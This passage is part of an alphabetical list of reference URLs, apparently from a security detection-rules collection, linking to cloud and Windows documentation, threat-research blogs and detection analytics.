TRONG_AUTHENTICATION\nhttps://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE\nhttps://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html\nhttps://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html\nhttps://developers.onelogin.com/api-docs/1/events/event-resource\nhttps:/
/developers.onelogin.com/api-docs/1/events/event-resource/\nhttps://deviceatlas.com/blog/list-of-user-agent-strings#desktop\nhttps://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/\nhttps://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/\nhttps://digital.nhs.uk/cyber-alerts/2018/cc-2825\nhttps://dirkjanm.io/a-different-way-of-abusing-zerologon/\nhttps://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3\nhttps://dmaasland.github.io/posts/citrix.html\nhttps://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html\nhttps://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html\nhttps://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBCluster.html\nhttps://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_ModifyDBCluster.html\nhttps://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html\nhttps://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html\nhttps://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html\nhttps://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html\nhttps://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html\nhttps://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html\nhttps://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html\nhttps://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html\nhttps://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ImportKeyPair.html\nhttps://docs.aws.amazon.com/cli/latest/reference/securityhub/\nhttps://docs.aws.amazon.com/config/latest/developerguide/cloudtrail-log-files-for-aws-config.html\nhttps://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html\nhttps://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html\nhttps://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html\nhttps://docs.aws.amazon.com/guar
dduty/latest/ug/guardduty_finding-types-kubernetes.html#privilegeescalation-kubernetes-privilegedcontainer\nhttps://docs.aws.amazon.com/guardduty/latest/ug/guardduty_suspend-disable.html\nhttps://docs.aws.amazon.com/IAM/latest/APIReference/API_DeleteSAMLProvider.html\nhttps://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html\nhttps://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html\nhttps://docs.aws.amazon.com/lambda/latest/dg/API_CreateFunctionUrlConfig.html\nhttps://docs.aws.amazon.com/lambda/latest/dg/API_UpdateFunctionConfiguration.html\nhttps://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html\nhttps://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html\nhttps://docs.aws.amazon.com/service-authorization/latest/reference/list_awsiamidentitycentersuccessortoawssinglesign-on.html\nhttps://docs.aws.amazon.com/singlesignon/latest/userguide/app-enablement.html\nhttps://docs.aws.amazon.com/singlesignon/latest/userguide/sso-info-in-cloudtrail.html\nhttps://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html\nhttps://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html\nhttps://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html\nhttps://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance\nhttps://docs.djangoproject.com/en/1.11/ref/exceptions/\nhttps://docs.djangoproject.com/en/1.11/topics/logging/#django-security\nhttps://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/328136827/config-user-group\nhttps://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44546/44546-logid-event-config-attr\nhttps://docs.github.com/en/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners\nhttps://docs.github.com/en/code-security/dependabot/dependabot-alerts/about-dependabot-alerts\nhttps://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-a
ctivity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise\nhttps://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#private_repository_forking\nhttps://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#ssh_certificate_authority\nhttps://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/about-secret-scanning\nhttps://docs.github.com/en/enterprise-cloud@latest/organizations/managing-git-access-to-your-organizations-repositories/about-ssh-certificate-authorities\nhttps://docs.github.com/en/migrations\nhttps://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/managing-security-and-analysis-settings-for-your-organization\nhttps://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions\nhttps://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions\nhttps://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#search-based-on-operation\nhttps://docs.github.com/en/organizations/keeping-your-organization-secure/managing-two-factor-authentication-for-your-organization/requiring-two-factor-authentication-in-your-organization\nhttps://docs.github.com/en/organizations/managing-oauth-access-to-your-organizations-data/disabling-oauth-app-access-restrictions-for-your-organization\nhttps://docs.github.com/en/organizations/managing-organization-settings/tran
sferring-organization-ownership\nhttps://docs.github.com/en/repositories/archiving-a-github-repository/archiving-repositories\nhttps://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-security-and-analysis-settings-for-your-repository\nhttps://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit\nhttps://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo\nhttps://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html\nhttps://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts\nhttps://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts\nhttps://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins\nhttps://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete\nhttps://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#appid-uri-added-modified-or-removed\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-configuration-changes\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-credentials\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-consent\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-oper
ations-applications#end-user-stopped-due-to-risk-based-consent\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#new-owner\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#service-principal-assigned-to-a-role\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#bitlocker-key-retrieval\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-administrator-roles\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#assignment-and-elevation\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-successful-unu
sual-sign-ins\nhttps://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#short-lived-accounts\nhttps://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes\nhttps://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy\nhttps://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory\nhttps://docs.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview#which-files-should-i-monitor\nhttps://docs.microsoft.com/en-us/azure/dns/dns-zones-records\nhttps://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations\nhttps://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization\nhttps://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes\nhttps://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy\nhttps://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference\nhttps://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference\nhttps://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0\nhttps://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services\nhttps://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services\nhttps://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe\nhttps://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool\nhttps://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool\nhttps://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback\nhttps://docs.m
icrosoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script\nhttps://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension\nhttps://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus\nhttps://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN\nhttps://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8\nhttps://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29\nhttps://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913\nhttps://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1\nhttps://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78\nhttps://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183\nhttps://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9\nhttps://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931\nhttps://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3\nhttps://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings\nhttps://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps\nhttps://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy\nhttps://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps\nhttps://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps\nhttps://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?vie
w=windowsserver2022-ps\nhttps://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature\nhttps://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps\nhttps://docs.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps\nhttps://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/invoke-command?view=powershell-7.2\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powe
rshell.security/get-acl?view=powershell-7.2\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2\nhttps://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2\nhttps://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps\nhttps://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps\nhttps://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate\nhttps://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps\nhttps://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo\nhttps://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps\nhttps://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-
2012/cc771151(v=ws.11)\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)\nhttps://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)\nhttps://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16\nhttps://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16\nhttps://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16\nhttps://docs.microsoft.com/en-us/sql/tools/sqlcmd-utility?view=sql-server-ver15\nhttps://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15\nhttps://docs.microsoft.com/en-us/sysinternals/downloads/autoruns\nhttps://docs.microsoft.com/en-us/sysinternals/downloads/procdump\nhttps://docs.microsoft.com/en-us/sysinternals/downloads/psexec\nhttps://docs.microsoft.com/en-us/sysinternals/downloads/psservice\nhttps://docs.microsoft.com/en-us/sysinternals/downloads/pssuspend\nhttps://docs.microsoft.com/en-us/sysinternals/downloads/sdelete\nhttps://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite\nhttps://docs.microsoft.com/en-us/sysinternals/downloads/sysmon\nhttps://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries\nhttps://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade\nhttps://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior\nhttps://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote
-desktop-connection-computer\nhttps://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v\nhttps://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019\nhttps://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set\nhttps://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace\nhttps://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax\nhttps://docs.microsoft.com/en-us/windows-hardware/drivers/taef/\nhttps://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/assoc\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/attrib\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/hostname\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace\nhttps://docs.microsoft.com/en-
us/windows-server/administration/windows-commands/rundll32\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-delete\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic\nhttps://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support\nhttps://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4624\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4776\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-at
p/attack-surface-reduction?WT.mc_id=twitter#block-process-creations-originating-from-psexec-and-wmi-commands\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules\nhttps://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?WT.mc_id=twitter\nhttps://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all\nhttps://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps\nhttps://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump\nhttps://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand\nhttps://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa\nhttps://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging\nhttps://docs.microsoft.com/en-us/windows/win32/intl/code-page-identifiers\nhttps://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights\nhttps://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys\nhttps://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN\nhttps://docs.microsoft.com/en-us/windows/win32/shell/launch\nhttps://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code\nhttps://docs.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml-\nhttps://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-managemen
t-architecture\nhttps://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp\nhttps://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior\nhttps://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings\nhttps://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps\nhttps://docs.oracle.com/cd/E19683-01/816-4883/6mb2joatd/index.html\nhttps://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-analytics-alert-reference/cortex-xdr-analytics-alert-reference/scrcons-exe-rare-child-process.html\nhttps://docs.python.org/2/library/simplehttpserver.html\nhttps://docs.python.org/3/library/site.html\nhttps://docs.python.org/3/using/cmdline.html#cmdoption-c\nhttps://docs.spring.io/spring-security/site/docs/current/api/overview-tree.html\nhttps://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm\nhttps://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e\nhttps://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b\nhttps://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf\nhttps://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view\nhttps://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing\nhttps://dtm.uk/wuauclt/\nhttps://duo.com/docs/adminapi#logs\nhttps://dzone.com/articles/remote-debugging-java-applications-with-jdwp\nhttps://ecasound.seul.org/ecasound/Documentation/examples.html#fconversions\nhttps://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/\nhttps://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88\nhttps://embracethered.com/blog/posts/2020/chrome-spy-remote-control/\nhttps://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/\nhttps://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/\nhttps://emkc.org
/s/RJjuLa\nhttps://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html\nhttps://en.wikipedia.org/wiki/Hangul_(word_processor)\nhttps://en.wikipedia.org/wiki/HTML_Application\nhttps://en.wikipedia.org/wiki/IExpress\nhttps://en.wikipedia.org/wiki/List_of_Microsoft_Office_filename_extensions\nhttps://en.wikipedia.org/wiki/Nohup\nhttps://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\nhttps://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/\nhttps://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/\nhttps://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/\nhttps://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/\nhttps://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/\nhttps://enterprise.arcgis.com/en/server/12.0/administer/windows/inside-an-arcgis-server-site.htm\nhttps://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/1ec33c93-3d0b-4a28-8014-dbdaae5c60ae.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html\nhttps://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html\nhttps://eqllib.readthedocs.io/en/latest/analyti
